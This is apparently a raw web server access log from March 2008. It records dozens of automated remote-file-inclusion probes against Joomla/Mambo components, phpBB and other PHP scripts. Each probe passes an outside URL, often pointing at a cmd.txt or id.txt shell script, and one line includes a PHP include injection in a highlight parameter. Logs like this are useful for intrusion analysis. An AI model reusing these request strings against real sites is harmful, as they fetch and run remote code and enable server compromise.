87.230.15.10 - - [23/Mar/2008:18:44:17 -0700] "GET /logs/auto.php?inc=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.36.241.244 - - [23/Mar/2008:18:47:22 -0700] "GET /index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.65.239.170 - - [23/Mar/2008:18:48:31 -0700] "GET /logs/access_070924.log HTTP/1.1" 200 1310720 "-" "-" "www.galf.org"
74.53.160.98 - - [23/Mar/2008:18:49:23 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.160.98 - - [23/Mar/2008:18:49:23 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.146.251.123 - - [23/Mar/2008:18:50:28 -0700] "GET /logs/access_071022.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
203.146.251.123 - - [23/Mar/2008:18:50:29 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
203.146.251.123 - - [23/Mar/2008:18:50:35 -0700] "GET /logs/access_080107.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
203.146.251.123 - - [23/Mar/2008:18:50:41 -0700] "GET /logs/access_080107.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:18:53:23 -0700] "GET /logs/access_080218.log/auto.php?inc=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.75.208.244 - - [23/Mar/2008:18:53:41 -0700] "GET /logs/access_080113.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.75.208.244 - - [23/Mar/2008:18:53:41 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.75.208.244 - - [23/Mar/2008:18:53:41 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.32.199.201 - - [23/Mar/2008:18:53:43 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ehlcc.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.galf.org"
72.36.235.74 - - [23/Mar/2008:18:53:45 -0700] "GET /index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.75.208.244 - - [23/Mar/2008:18:54:14 -0700] "GET /logs/access_071022.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.52.2.130 - - [23/Mar/2008:18:55:12 -0700] "GET /index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.234.144.44 - - [23/Mar/2008:18:56:34 -0700] "GET /logs/access_071022.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.234.144.44 - - [23/Mar/2008:18:56:34 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.234.144.44 - - [23/Mar/2008:18:56:35 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.72.181.15 - - [23/Mar/2008:18:57:38 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
202.12.29.5 - - [23/Mar/2008:18:58:02 -0700] "GET /logs/access_071022.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://CMD/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.12.29.5 - - [23/Mar/2008:18:58:02 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://CMD/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.12.29.5 - - [23/Mar/2008:18:58:49 -0700] "GET /logs/access_080107.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://CMD/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.36.241.244 - - [23/Mar/2008:18:59:18 -0700] "GET /logs/access_071112.log/index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.36.241.244 - - [23/Mar/2008:18:59:18 -0700] "GET /logs/index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.44.131.8 - - [23/Mar/2008:19:01:08 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://emredijital.com.tr/administrator/components/com_remository/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.galf.org"
204.213.247.235 - - [23/Mar/2008:19:01:27 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/suntix77/canda-ops.txt%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
70.86.111.2 - - [23/Mar/2008:19:02:33 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gomaka.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
70.86.111.2 - - [23/Mar/2008:19:02:34 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gomaka.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
195.137.139.73 - - [23/Mar/2008:19:02:38 -0700] "GET /logs/access_071008.log/index.php?option=com_phpshop&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.137.139.73 - - [23/Mar/2008:19:02:38 -0700] "GET /logs/index.php?option=com_phpshop&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:19:02:42 -0700] "GET /logs/access_071217.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:19:02:42 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:19:02:43 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
190.54.28.163 - - [23/Mar/2008:19:02:48 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.162.134.138 - - [23/Mar/2008:19:03:24 -0700] "GET /logs/access_071022.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.162.134.138 - - [23/Mar/2008:19:03:25 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.162.134.138 - - [23/Mar/2008:19:03:25 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:19:03:58 -0700] "GET /logs/access.log/nav.php?p=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:19:03:58 -0700] "GET /nav.php?p=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:19:03:59 -0700] "GET /logs/nav.php?p=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.32.199.201 - - [23/Mar/2008:19:04:29 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ehlcc.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "galf.org"
72.32.199.201 - - [23/Mar/2008:19:04:30 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ehlcc.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "galf.org"
85.214.56.123 - - [23/Mar/2008:19:04:37 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.56.123 - - [23/Mar/2008:19:04:37 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.32.199.201 - - [23/Mar/2008:19:04:38 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ehlcc.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.galf.org"
72.32.199.201 - - [23/Mar/2008:19:04:38 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ehlcc.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
219.166.61.155 - - [23/Mar/2008:19:04:41 -0700] "GET /logs/access_071022.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
219.166.61.155 - - [23/Mar/2008:19:04:42 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:19:04:48 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
87.230.15.10 - - [23/Mar/2008:19:04:49 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
87.230.15.10 - - [23/Mar/2008:19:04:49 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
189.20.228.26 - - [23/Mar/2008:19:05:15 -0700] "GET /logs/include/write.php?dir=http://www.arquivosweb.tecnologia.ws/cmd.gif?&cmd=id HTTP/1.1" 404 275 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.galf.org"
85.119.152.13 - - [23/Mar/2008:19:05:22 -0700] "GET /logs/access_071112.log/index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
85.25.137.24 - - [23/Mar/2008:19:05:35 -0700] "GET /logs/access_071224.log/index.php?cal=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.137.24 - - [23/Mar/2008:19:05:35 -0700] "GET /index.php?cal=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.137.24 - - [23/Mar/2008:19:05:35 -0700] "GET /logs/index.php?cal=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.137.139.73 - - [23/Mar/2008:19:06:17 -0700] "GET /index.php?option=com_a6mambohelpdesk&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.195.44.110 - - [23/Mar/2008:19:06:57 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
85.119.152.13 - - [23/Mar/2008:19:06:58 -0700] "GET /logs/access_071217.log/index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
67.195.44.92 - - [23/Mar/2008:19:06:59 -0700] "GET /logs/access_070903.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
70.86.111.2 - - [23/Mar/2008:19:07:10 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gomaka.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "galf.org"
70.86.111.2 - - [23/Mar/2008:19:07:11 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gomaka.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "galf.org"
66.7.207.104 - - [23/Mar/2008:19:07:17 -0700] "GET //?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.808" "www.galf.org"
72.52.195.135 - - [23/Mar/2008:19:07:46 -0700] "GET /logs/index.php?option=com_swmenumaker&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.galf.org"
72.52.195.135 - - [23/Mar/2008:19:07:46 -0700] "GET /index.php?option=com_swmenumaker&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
74.52.2.130 - - [23/Mar/2008:19:08:12 -0700] "GET /logs/access_071112.log/index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.2.130 - - [23/Mar/2008:19:08:13 -0700] "GET /logs/index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.50.105.133 - - [23/Mar/2008:19:08:13 -0700] "GET /logs/access_071028.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.50.105.133 - - [23/Mar/2008:19:08:14 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.50.105.133 - - [23/Mar/2008:19:08:14 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.118.102.153 - - [23/Mar/2008:19:08:33 -0700] "GET /logs/index.php?option=com_akobook&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
87.118.102.153 - - [23/Mar/2008:19:08:33 -0700] "GET /index.php?option=com_akobook&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
195.137.139.73 - - [23/Mar/2008:19:08:52 -0700] "GET /logs/access.log/index.php?option=com_phpshop&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.9.145.111 - - [23/Mar/2008:19:11:14 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.lirik.biz//skins/bobbyzhuo/.debug/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.213.247.235 - - [23/Mar/2008:19:12:15 -0700] "GET /logs/access_080225.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/suntix77/canda-ops.txt%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
72.36.235.74 - - [23/Mar/2008:19:12:32 -0700] "GET /logs/access_071112.log/index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.36.235.74 - - [23/Mar/2008:19:12:32 -0700] "GET /logs/index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.177.8.166 - - [23/Mar/2008:19:13:16 -0700] "GET /logs/access_070924.log HTTP/1.1" 200 2490368 "-" "-" "www.galf.org"
206.221.184.180 - - [23/Mar/2008:19:13:22 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.221.184.180 - - [23/Mar/2008:19:13:22 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.235.74 - - [23/Mar/2008:19:14:21 -0700] "GET /logs/access_071217.log/index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.50.105.133 - - [23/Mar/2008:19:15:55 -0700] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.50.105.133 - - [23/Mar/2008:19:15:56 -0700] "GET //skin/zero_vote/error.php?dir=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.50.105.133 - - [23/Mar/2008:19:15:56 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.162.134.138 - - [23/Mar/2008:19:16:59 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.162.134.138 - - [23/Mar/2008:19:16:59 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.137.139.73 - - [23/Mar/2008:19:17:06 -0700] "GET /logs/access.log/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.10.47.53 - - [23/Mar/2008:19:17:16 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.10.47.53 - - [23/Mar/2008:19:17:16 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
210.109.103.220 - - [23/Mar/2008:19:18:25 -0700] "GET /logs/access_071014.log//store.php?thisdir=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.109.103.220 - - [23/Mar/2008:19:18:25 -0700] "GET //store.php?thisdir=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.109.103.220 - - [23/Mar/2008:19:18:26 -0700] "GET /logs//store.php?thisdir=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.30.226.157 - - [23/Mar/2008:19:19:04 -0700] "GET /logs/access_071203.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
66.7.207.104 - - [23/Mar/2008:19:20:53 -0700] "GET /logs/access_070709.log//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.207.104 - - [23/Mar/2008:19:20:54 -0700] "GET /logs//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 200 6806 "-" "libwww-perl/5.808" "www.galf.org"
85.234.144.44 - - [23/Mar/2008:19:21:01 -0700] "GET /logs/access_070730.log//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
160.99.12.231 - - [23/Mar/2008:19:21:20 -0700] "GET /logs/access_070709.log//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
160.99.12.231 - - [23/Mar/2008:19:21:20 -0700] "GET //?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.65" "www.galf.org"
160.99.12.231 - - [23/Mar/2008:19:21:20 -0700] "GET /logs//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 200 6806 "-" "libwww-perl/5.65" "www.galf.org"
194.126.239.14 - - [23/Mar/2008:19:21:28 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.126.239.14 - - [23/Mar/2008:19:21:28 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.126.239.14 - - [23/Mar/2008:19:21:29 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
